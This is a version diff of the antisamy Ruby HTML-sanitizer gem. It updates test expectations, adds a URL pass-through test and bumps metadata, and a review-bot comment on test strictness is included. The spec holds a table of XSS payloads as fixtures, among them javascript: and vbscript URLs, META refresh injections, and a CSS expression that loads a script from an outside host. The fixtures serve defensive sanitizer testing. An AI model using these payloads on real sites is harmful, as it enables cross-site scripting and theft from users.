antisamy 0.2.0 → 0.2.1
- data/lib/antisamy/html/sax_filter.rb +1 -1
- data/spec/antisamy_spec.rb +9 -3
- metadata +2 -2
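--- a/data/spec/antisamy_spec.rb
+++ b/data/spec/antisamy_spec.rb
@@ -85,8 +85,8 @@ module AntiSamy
 "<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>" => "xss",
 "<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS" => "javascript",
 "<IMG SRC='vbscript:msgbox(\"XSS\")'>" => "vbscript",
-"<a . href=\"http://www.test.com\">" => "
-"<a - href=\"http://www.test.com\">" => "
+"<a . href=\"http://www.test.com\">" => " . ",
+"<a - href=\"http://www.test.com\">" => "-",
 "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">" => "meta",
 "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">" => "meta",
 "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">" => "meta",
@@ -114,7 +114,7 @@ module AntiSamy
 "<a href='aim: &c:\\windows\\system32\\calc.exe' ini='C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\pwnd.bat'>" => "calc.exe",
 "<!--\n<A href=\n- --><a href=javascript:alert:document.domain>test-->" => "javascript",
 "<a></a style=\"\"xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')\">" => "<a style=",
-"<a onblur=\"alert(secret)\" href=\"http://www.google.com\">Google</a>" => "
+"<a onblur=\"alert(secret)\" href=\"http://www.google.com\">Google</a>" => "blur",
 "<b><i>Some Text</b></i>" => "<i />",
 "<div style=\"font-family: Geneva, Arial, courier new, sans-serif\">" => "font-family",
 "<style type=\"text/css\"><![CDATA[P { margin-bottom: 0.08in; } ]]></style>" => "margin"
@@ -132,5 +132,11 @@ module AntiSamy
 r.clean_html.should_not be_empty
 end
 
+it "should not touch this url" do
+input = "<a href=\"http://www.aspectsecurity.com\">Aspect Security</a>"
+r = AntiSamy.scan(input,policy_object)
+r.clean_html.should == input
+end
+
 end
 end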
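Review bot: The new example at spec line 135 pins the output byte-for-byte with `r.clean_html.should == input`, which is much stricter than the `should_not be_empty` check just above it and than the table entries in the earlier hunks, which appear to be substring expectations; any harmless re-serialization by the sanitizer (attribute re-quoting, whitespace, self-closing form) would fail it the same way an altered URL would. If exact pass-through of a plain absolute `http` anchor is the intended contract, a one-line comment stating that would keep a later serializer change from being misread as a sanitization regression, e.g. `# a plain http href must survive scanning unchanged, byte for byte`. Separately, `AntiSamy.scan(input,policy_object)` is missing the space after the comma. The `describe` block enclosing these examples starts outside the hunk, and `policy_object` is presumably defined there.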
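--- a/metadata
+++ b/metadata
@@ -2,7 +2,7 @@
 name: antisamy
 version: !ruby/object:Gem::Version
 prerelease:
-version: 0.2.
+version: 0.2.1
 platform: ruby
 authors:
 - Sal Scotto
@@ -174,7 +174,7 @@ required_ruby_version: !ruby/object:Gem::Requirement
 requirements:
 - - ">="
 - !ruby/object:Gem::Version
-hash: -
+hash: -3180054777523401817
 segments:
 - 0
 version: "0"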